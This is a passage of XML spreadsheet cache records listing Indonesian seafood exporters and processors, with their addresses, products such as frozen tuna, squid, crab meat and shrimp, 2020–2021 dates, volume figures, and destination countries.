    <s v="Jl. Raya Salembaran Komplek Pergudangan Royal Kosambi Blok D6 RT 006 RW 003, Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Tangerang"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="16912"/>
    <x v="232"/>
    <s v="PT. MARINA MAKMUR SEJAHTERA"/>
    <s v="Jl. Raya Salembaran Komplek Pergudangan Royal Kosambi Blok D6 RT 006 RW 003, Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Demersal Beku (Kakap Merah)"/>
    <d v="2020-03-10T00:00:00"/>
    <n v="100000"/>
    <s v="Kabupaten Tangerang"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="20312"/>
    <x v="158"/>
    <s v="PT. DUTA BUANA PACIFIC"/>
    <s v="Komplek PPN Tanjungpandan, Jl. RE Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Ikan Pelagis Beku (Tenggiri)"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="50000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="20313"/>
    <x v="158"/>
    <s v="PT. DUTA BUANA PACIFIC"/>
    <s v="Komplek PPN Tanjungpandan, Jl. RE Martadinata RT 007 RW 002, Kel. Kota, Kec. Tanjungpandan, Kabupaten Belitung&lt;br&gt;Kepulauan Bangka Belitung"/>
    <n v="6"/>
    <s v="Cephalopoda Beku (Sotong, Cumi-cumi)"/>
    <d v="2020-04-06T00:00:00"/>
    <n v="69000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="20629"/>
    <x v="94"/>
    <s v="CV, SINAR TIRTA"/>
    <s v="Jl, Rembang Industri VII/3 Pier Pasuruan, Kel, Pejangkungan, Kec, Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Layur, Kembung, Cakalang, Tenggiri, Tonang)"/>
    <d v="2020-07-20T00:00:00"/>
    <n v="455000"/>
    <s v="Kota Jakarta Pusat"/>
    <s v="China, Thailand"/>
  </r>
  <r>
    <n v="20742"/>
    <x v="8"/>
    <s v="PT. CENHONG FISHERINDO"/>
    <s v="Pelabuhan Perikanan Samudera Nizam Zachman Jl. Muara Baru Ujung Blok L No.3 Room 4 dan 5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-02T00:00:00"/>
    <n v="59273"/>
    <s v="Kota Jakarta Utara"/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="16844"/>
    <x v="233"/>
    <s v="PT. MODERN MITRA SEJATI"/>
    <s v="Jl. Rungkut Industri III No.85, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Gulama, Lencam, Manyung, Kerapu, Kakatua, Kakap, Kurisi, Barramundi)"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="16849"/>
    <x v="234"/>
    <s v="PT. MURIA BAHARI INDONESIA"/>
    <s v="Jl. Raya Tulis RT 03 RW 08, Kel. Besito, Kec. Gebog, Kabupaten Kudus&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-12T00:00:00"/>
    <n v="206356"/>
    <m/>
    <s v="Japan, Thailand"/>
  </r>
  <r>
    <n v="16869"/>
    <x v="233"/>
    <s v="PT. MODERN MITRA SEJATI"/>
    <s v="Jl. Rungkut Industri III No.85, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Barakuda, Tongkol, Kembung, Lemadang, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="3500000"/>
    <m/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="16870"/>
    <x v="233"/>
    <s v="PT. MODERN MITRA SEJATI"/>
    <s v="Jl. Rungkut Industri III No.85, Kel. Rungkut Tengah, Kec. Gunung Anyar, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Gurami, Bandeng, Patin, Nila)"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="1500000"/>
    <m/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="19728"/>
    <x v="132"/>
    <s v="PT. ANUGERAH KERAMAT INDAH"/>
    <s v="Jl. Kol Yos Sudarso Lingkungan V, Kel. Sei Merbau, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Viet Nam"/>
  </r>
  <r>
    <n v="19730"/>
    <x v="132"/>
    <s v="PT. ANUGERAH KERAMAT INDAH"/>
    <s v="Jl. Kol Yos Sudarso Lingkungan V, Kel. Sei Merbau, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="19809"/>
    <x v="235"/>
    <s v="PT, HENTRY JAYA"/>
    <s v="Jl, Ikan Tuna Raya No,17 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Japan, Thailand"/>
  </r>
  <r>
    <n v="19810"/>
    <x v="235"/>
    <s v="PT. HENTRY JAYA"/>
    <s v="Jl. Ikan Tuna Raya No.17 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-19T00:00:00"/>
    <n v="250"/>
    <m/>
    <s v="Japan, Thailand"/>
  </r>
  <r>
    <n v="20437"/>
    <x v="101"/>
    <s v="PT. AQUAFARM NUSANTARA"/>
    <s v="Jl. Tambak Aji V No.9, Kel. Tambak Aji, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kulit Nila Beku"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="120384"/>
    <m/>
    <s v="France, Germany"/>
  </r>
  <r>
    <n v="20843"/>
    <x v="236"/>
    <s v="PT. HASIL LAUT BERSAMA"/>
    <s v="Jl. Garuda, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-Cumi)"/>
    <d v="2020-08-28T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="China, Malaysia"/>
  </r>
  <r>
    <n v="20915"/>
    <x v="209"/>
    <s v="PT. NUTRINDO FRESFOOD INTERNASIONAL"/>
    <s v="Lingkungan I, Kel. Tanjung Merah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="324000"/>
    <m/>
    <s v="Japan, Viet Nam"/>
  </r>
  <r>
    <n v="19737"/>
    <x v="237"/>
    <s v="PT. KIU KIU FISHERY"/>
    <s v="Jl. Tuna II Blok K 7 B Pelabuhan Perikanan Samudera Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-02-24T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Cirebon, Kota Cirebon, Kabupaten Pati, Kabupaten Tangerang, Kota Tangerang"/>
    <s v="Chile, Norway"/>
  </r>
  <r>
    <n v="19589"/>
    <x v="238"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Teri, Tongkol, Tembang, Kembung, Lemadang, Marlin, Layaran, Cakalang, Tenggiri, Pedang, Selar Kuning)"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20270"/>
    <x v="239"/>
    <s v="PT. LAUTAN JAYA SEKAWAN"/>
    <s v="Jl. Raya Bitung Manado, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-04-13T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20271"/>
    <x v="239"/>
    <s v="PT. LAUTAN JAYA SEKAWAN"/>
    <s v="Jl. Raya Bitung Manado, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-04-13T00:00:00"/>
    <n v="25000"/>
    <s v="Kota Jakarta Pusat, Kota Surabaya"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20272"/>
    <x v="239"/>
    <s v="PT. LAUTAN JAYA SEKAWAN"/>
    <s v="Jl. Raya Bitung Manado, Kel. Sagerat, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Layang, Cakalang)"/>
    <d v="2020-04-13T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="17430"/>
    <x v="143"/>
    <s v="PT. ANEKA SUMBER ALAM JAYA"/>
    <s v="Jl. Pandaan Bangil Km 4, Dusun Tudan, Kel. Kemiri Sewu, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Gurami, Bandeng, Patin, Nila)"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="300000"/>
    <s v="Kota Surabaya"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="17432"/>
    <x v="143"/>
    <s v="PT. ANEKA SUMBER ALAM JAYA"/>
    <s v="Jl. Pandaan Bangil Km 4, Dusun Tudan, Kel. Kemiri Sewu, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demesal Beku (Kakap Putih, Gulama, Lencam, Manyung, Biji Nangka, Kerapu, Layur, Kakatua, Bawal, Kakap, Kaci-kaci, Kurisi, Ekor Kuning)"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="1200000"/>
    <s v="Kota Surabaya"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20805"/>
    <x v="240"/>
    <s v="UD. TOMINI BAY SEAFOOD"/>
    <s v="Jl. Teterusan No.55, Kel. Mapanget, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="30000"/>
    <s v="Kota Surabaya"/>
    <s v="United States"/>
  </r>
  <r>
    <n v="16874"/>
    <x v="219"/>
    <s v="PT. SUMBER MINA BAHARI"/>
    <s v="Jl. Raya Rembang - Tuban Km 31, Kel. Sumber Sari, Kec. Kragan, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2020-02-27T00:00:00"/>
    <n v="679926"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="17032"/>
    <x v="241"/>
    <s v="PT. NUANSA CIPTA MAGELLO"/>
    <s v="Jl. Kima III Kav 5 AB, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Kakap, Lencam, Kambing-kambing, Jenaha, Kerapu, Kakatua, Pinjalo, Jenggot, Kurisi)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="20000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="17312"/>
    <x v="242"/>
    <s v="PT. VESSEL FRESHFISH INDOMAKMUR"/>
    <s v="Kawasan Industri Jatake, Jl. Industri Raya II Blok J No.5 , Kel. Pasir Jaya, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Ikan Pelagis Beku (Teri, Lemuru, Barakuda, Terbang, Salem, Kuwe, Kembung, Selar, Layang, Tenggiri, Baronang)"/>
    <d v="2020-01-10T00:00:00"/>
    <n v="350000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19253"/>
    <x v="243"/>
    <s v="MINI PLANT PUTRI AYU"/>
    <s v="Dusun Daksan, Kel. Aengsareh, Kec. Sampang, Kabupaten Sampang&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Rebus Dingin"/>
    <d v="2021-06-22T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19347"/>
    <x v="244"/>
    <s v="MINI PLANT PROYEK 1"/>
    <s v="Jl. TPI Prapag Kidul RT 05 RW 04, Kel. Prapag Kidul, Kec. Losari, Kabupaten Brebes&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Rajungan Rebus Dingin"/>
    <d v="2020-04-15T00:00:00"/>
    <n v="108000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19348"/>
    <x v="245"/>
    <s v="PT. MORENZO ABADI PERKASA"/>
    <s v="Desa Gajah RT 002 RW 003, Kec. Gajah, Kabupaten Demak&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2020-02-21T00:00:00"/>
    <n v="19000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19387"/>
    <x v="246"/>
    <s v="PT, SIGER JAYA SENTOSA"/>
    <s v="Jl, Raya Tanjung Bintang No,101, Kel, Serdang, Kec, Tanjung Bintang, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19452"/>
    <x v="247"/>
    <s v="CV. KUDATAMA MAS"/>
    <s v="Jl. KIG Raya Barat Kav G-2, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Pasteurisasi"/>
    <d v="2020-04-07T00:00:00"/>
    <n v="108291"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19456"/>
    <x v="166"/>
    <s v="PT. TRIDAYA ERAMINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Greece, Spain"/>
  </r>
  <r>
    <n v="19904"/>
    <x v="248"/>
    <s v="PT. PANCA MITRA MULTIPERDANA - PLANT 2"/>
    <s v="Jl. Raya Wonokoyo No.3, Dusun Laok Bindung RT 02 RW 03, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="855200"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19905"/>
    <x v="248"/>
    <s v="PT. PANCA MITRA MULTIPERDANA - PLANT 2"/>
    <s v="Jl. Raya Wonokoyo No.3, Dusun Laok Bindung RT 02 RW 03, Kel. Landangan, Kec. Kapongan, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-03-31T00:00:00"/>
    <n v="1166020"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19918"/>
    <x v="249"/>
    <s v="PT. SUMBER MINA SAMUDERA"/>
    <s v="Jl. Ikan Tuna III No.1A Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19933"/>
    <x v="250"/>
    <s v="PT. AGRITA BEST SEAFOOD"/>
    <s v="Gedung Coolroom No.4 Kawasan Pelabuhan Muara Angke, Jl. Dermaga Muara Angke No.4, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi, Sotong)"/>
    <d v="2020-03-09T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19972"/>
    <x v="251"/>
    <s v="PT. PRIMO INDO IKAN"/>
    <s v="Jl. Ikan Tuna I No.1 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Balimong, Lencam, Angoli, Kerapu, Kakatua, Seabream, Kakap, Kurisi)"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19973"/>
    <x v="251"/>
    <s v="PT. PRIMO INDO IKAN"/>
    <s v="Jl. Ikan Tuna I No.1 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Balimong, Lencam, Angoli, Kerapu, Kakatua, Seabream, Kakap, Kurisi)"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19974"/>
    <x v="251"/>
    <s v="PT. PRIMO INDO IKAN"/>
    <s v="Jl. Ikan Tuna I No.1 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19975"/>
    <x v="251"/>
    <s v="PT. PRIMO INDO IKAN"/>
    <s v="Jl. Ikan Tuna I No.1 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Lemadang, Marlin, Meka, Semar, Tenggiri)"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="19976"/>
    <x v="251"/>
    <s v="PT, PRIMO INDO IKAN"/>
    <s v="Jl, Ikan Tuna I No,1 Pelabuhan Benoa, Kel, Pedungan, Kec, Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-23T00:00:00"/>
    <n v="890481"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20221"/>
    <x v="169"/>
    <s v="CV. GIOVANNI SUKSES MAKMUR"/>
    <s v="Jl. Berbek Industri 5 No.1, Kel. Berbek, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Emperor, Kerapu, Kakap)"/>
    <d v="2020-04-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20231"/>
    <x v="252"/>
    <s v="PT. GLOBAL MAJU PRATAMA"/>
    <s v="Pattene Business Park Blok H No.2, Kel. Pabentengan, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Keong Beku"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20352"/>
    <x v="41"/>
    <s v="CV. BUANA LAUT NUSANTARA"/>
    <s v="Jl. Kima VI Kav F1/B1, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Gurita Rebus Beku"/>
    <d v="2020-09-14T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20382"/>
    <x v="104"/>
    <s v="PT. ERA MANDIRI CEMERLANG TBK"/>
    <s v="Ruko Lodan Center, Jl. Lodan Raya No.2 Blok F No.2-7, Kel. Ancol, Kec. Pademangan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-28T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20435"/>
    <x v="101"/>
    <s v="PT. AQUAFARM NUSANTARA"/>
    <s v="Jl. Tambak Aji V No.9, Kel. Tambak Aji, Kec. Ngaliyan, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Nila Loin Beku"/>
    <d v="2021-04-13T00:00:00"/>
    <n v="163596"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20575"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Udang Bernilai Tambah Beku (Udang Pop Corn, Eby Fry, Udang Butterfly) "/>
    <d v="2020-06-25T00:00:00"/>
    <n v="26535"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20579"/>
    <x v="49"/>
    <s v="PT. FRESH ON TIME SEAFOOD"/>
    <s v="Jl. Raya Narogong Km 26.5 Kawasan Industri Kembang Kuning, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Daging Rajungan Pasteurisasi Beku"/>
    <d v="2020-06-25T00:00:00"/>
    <n v="23479"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20667"/>
    <x v="108"/>
    <s v="PT. CHEN WOO FISHERY"/>
    <s v="Jl. Worang By Pass, Desa Kaima, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Segar (Lemadang, Layang)"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20669"/>
    <x v="108"/>
    <s v="PT. CHEN WOO FISHERY"/>
    <s v="Jl. Worang By Pass, Desa Kaima, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Lemadang, Layang)"/>
    <d v="2020-04-09T00:00:00"/>
    <n v="0"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20675"/>
    <x v="199"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Ir. Sutami Km 7, Kel. Kota Baru, Kec. Tanjung Karang Timur, Kota Bandar Lampung&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="240"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20676"/>
    <x v="199"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Ir. Sutami Km 7, Kel. Kota Baru, Kec. Tanjung Karang Timur, Kota Bandar Lampung&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Seafood Bernilai Tambah Beku"/>
    <d v="2020-06-15T00:00:00"/>
    <n v="520"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20769"/>
    <x v="253"/>
    <s v="PT. BUMI MENARA INTERNUSA"/>
    <s v="Jl. Pulau Sumbawa II No.5A KIM II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Daging Rajungan Pasteurisasi Kaleng"/>
    <d v="2020-06-05T00:00:00"/>
    <n v="500"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20818"/>
    <x v="254"/>
    <s v="PT. INTI LAUTAN FAJAR ABADI"/>
    <s v="Jl. Wonokoyo 1 RT 01 RW 06, Kel. Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Segar (Bream, Lencam, Manyung, Kuwe, Anggoli, Kerapu, Kakatua, Pinjalo, Kakap, Kaci-kaci, Barramundi)"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="979491"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20819"/>
    <x v="254"/>
    <s v="PT. INTI LAUTAN FAJAR ABADI"/>
    <s v="Jl. Wonokoyo 1 RT 01 RW 06, Kel. Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Bream, Lencam, Manyung, Kuwe, Anggoli, Kerapu, Kakatua, Pinjalo, Kakap, Kaci-kaci, Barramundi)"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="1469237"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20820"/>
    <x v="254"/>
    <s v="PT. INTI LAUTAN FAJAR ABADI"/>
    <s v="Jl. Wonokoyo 1 RT 01 RW 06, Kel. Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Cakalang, Tenggiri, Pedang, Cobia)"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="119227"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20821"/>
    <x v="254"/>
    <s v="PT. INTI LAUTAN FAJAR ABADI"/>
    <s v="Jl. Wonokoyo 1 RT 01 RW 06, Kel. Wonokoyo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="34083"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20853"/>
    <x v="255"/>
    <s v="PT. PHILLIPS SEAFOODS INDONESIA"/>
    <s v="Jl. Raya Kemantrenrejo Km 10 RT 07 RW 01, Kel. Kemantren Rejo, Kec. Rejoso, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20889"/>
    <x v="256"/>
    <s v="PT, SAMUDRA SEAFOOD PRODUCTS"/>
    <s v="Jl, Gatot Subroto No,4, Kel, Bulusan, Kec, Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="4643685.5"/>
    <m/>
    <s v="United States"/>
  </r>
  <r>
    <n v="20890"/>
    <x v="256"/>
    <s v="PT, SAMUDRA SEAFOOD PRODUCTS"/>
    <s v="Jl, Gatot Subroto No,4, Kel, Bulusan, Kec, Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
